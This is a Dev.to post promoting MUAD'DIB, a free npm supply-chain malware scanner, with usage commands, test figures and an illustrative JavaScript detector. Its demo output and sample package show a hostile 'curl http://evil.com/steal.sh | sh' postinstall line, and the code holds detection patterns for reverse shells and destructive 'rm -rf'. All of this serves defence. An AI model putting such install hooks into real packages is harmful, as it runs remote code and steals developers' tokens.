I built a free npm supply chain scanner - looking for testers
Source: Dev.to

Last year, a single malicious npm package compromised over 25,000 repositories. The attack was simple: publish a package with a name close to a popular one, add a postinstall script that steals tokens, and wait.
I built MUAD’DIB to catch this kind of thing before it hits your project. It’s free, open‑source, and I’m looking for people to break it.
What it does
MUAD’DIB scans your node_modules and project files for signs of malicious code. It doesn’t rely only on known bad packages – it actually reads the code and looks for suspicious behavior.
9 detection engines run in parallel:
- AST analysis – parses JavaScript with Acorn and flags dangerous patterns (e.g., `eval` with dynamic arguments, `child_process` spawning, credential access).
- Dataflow tracking – connects the dots between reading a sensitive file and sending it over HTTP.
- Shell pattern detection – catches `curl | sh`, reverse shells, and destructive commands in npm scripts.
- Typosquatting – flags dependencies that look like popular packages (Levenshtein distance).
- Obfuscation detection – spots hex encoding, single‑char variables, `_0x` patterns.
- IOC matching – compares against 1,500+ known malicious package signatures.
- Hash verification – SHA‑256 matching against known malware files.
- Package metadata – analyzes `package.json` for suspicious lifecycle scripts.
- GitHub Actions – detects injection vulnerabilities in workflow files.
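To make two of these engines concrete, here is an added example (my illustration, not code from the MUAD’DIB repository): the lifecycle-script shell-pattern check and the Levenshtein typosquat check, run over a constructed `package.json`. The popular-package list and the regexes are assumptions for illustration, not the tool’s signature set.

```javascript
// Added example, not MUAD'DIB's own code: lifecycle-script shell patterns plus a Levenshtein typosquat check (lists/regexes are assumptions).
const POPULAR = ["lodash", "express", "react", "axios", "chalk"]; // assumed "popular" list
const LIFECYCLE = ["preinstall", "install", "postinstall", "prepare"]; // hooks that run on install
const SHELL_PATTERNS = [ // install-time command shapes a defender would flag
  { name: "pipe_to_shell", re: /\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b/ },
  { name: "reverse_shell", re: /\/dev\/tcp\/|\bnc\b.*\s-e\s/ },
  { name: "destructive_rm", re: /\brm\s+-rf\s+[\/~]/ },
];
// Single-row Levenshtein edit distance between two strings.
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0]; row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = above;
    }
  }
  return row[b.length];
}
// Dependencies within edit distance 1-2 of a popular name (distance 0 is the real package).
function typosquats(deps, popular = POPULAR) {
  const hits = [];
  for (const dep of Object.keys(deps)) {
    for (const pop of popular) {
      const d = levenshtein(dep, pop);
      if (d > 0 && d <= 2) hits.push({ dep, lookalike: pop, distance: d });
    }
  }
  return hits;
}
// Lifecycle hooks whose command matches a shell pattern; ordinary scripts like "test" are ignored.
function suspiciousScripts(scripts) {
  const hits = [];
  for (const hook of LIFECYCLE) {
    const cmd = scripts[hook]; if (!cmd) continue;
    for (const { name, re } of SHELL_PATTERNS) if (re.test(cmd)) hits.push({ hook, pattern: name, cmd });
  }
  return hits;
}
function scanPackageJson(text) {
  const pkg = JSON.parse(text);
  return { scripts: suspiciousScripts(pkg.scripts || {}), typosquats: typosquats({ ...pkg.dependencies, ...pkg.devDependencies }) };
}
// Constructed sample mirroring the demo below: a pipe-to-shell postinstall plus a lodash lookalike.
const SAMPLE = JSON.stringify({ name: "demo", scripts: { postinstall: "curl http://evil.com/steal.sh | sh", test: "jest" },
  dependencies: { lodahs: "^4.17.0", express: "^4.18.0" } });
console.log(JSON.stringify(scanPackageJson(SAMPLE), null, 2));
```

Running it reports the `postinstall` hook as `pipe_to_shell` and `lodahs` as a distance-2 lookalike of `lodash`, while the exact `express` dependency and the `test` script are not flagged.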
Quick demo
```
npx muaddib-scanner scan .

[SCORE] 78/100 [████████████████░░░░] DANGEROUS
CRITICAL: postinstall_script
  -> curl http://evil.com/steal.sh | sh
  Playbook: Remove the package immediately. Check ~/.npmrc
  and environment variables for leaked tokens.
```
The tool runs locally and requires no account, API key, or quota. It returns a risk score (0‑100), a threat breakdown, and response playbooks.
How to use it
CLI
```bash
npm install -g muaddib-scanner
muaddib scan ./my-project
muaddib scan ./my-project --paranoid   # flags everything suspicious
muaddib scan ./my-project --json       # machine‑readable output
```
Safe install (checks before installing)
```bash
muaddib install some-package
```
Pre‑commit hook (blocks commits with threats)
```bash
muaddib init-hooks
```
GitHub Action
```yaml
- uses: DNSZLSK/muad-dib@master
  with:
    scan_path: '.'
    fail_on: 'high'
```
VS Code extension
Search for “MUAD’DIB” in the VS Code Marketplace or install directly from the marketplace link.
What I’m looking for
I’ve tested MUAD’DIB against 15 simulated attack scenarios (100 % detection) and 56 fuzz vectors (0 crashes), but lab conditions aren’t production. I need real‑world feedback on:
- False positives – Did it flag something legitimate? What was it?
- Missed threats – Did you find something suspicious that MUAD’DIB didn’t catch?
- Usability – Was the output clear? Did the playbooks help?
- Performance – How long did it take on large projects? Any hangs?
If you find anything, please open an issue on the GitHub repo or leave a comment.
The numbers
| Metric | Value |
|---|---|
| Detection engines | 9 |
| Known malicious signatures | 1,500+ |
| Unit tests | 145 |
| Fuzz tests | 56 |
| Code coverage | 80 % |
| Adversarial detection rate | 15/15 (100 %) |
| Security audit findings | 58 found, 58 fixed |
| Dependencies with CVEs | 0 |
| Price | Free forever |
The full security audit report is available in the repository.
Why not just use Snyk/Socket?
You should – they’re great tools. MUAD’DIB isn’t trying to replace them, but it offers:
- No account required
- No rate limits or quotas
- Fully offline operation after install
- Built‑in response playbooks, not just alerts
- Open‑source and auditable
- Works as a pre‑commit hook, GitHub Action, and VS Code extension
For a quick check on a side project, `npx muaddib-scanner scan .` finishes in about 3 seconds.
Try it
```bash
npx muaddib-scanner scan .
```
Tell me what breaks.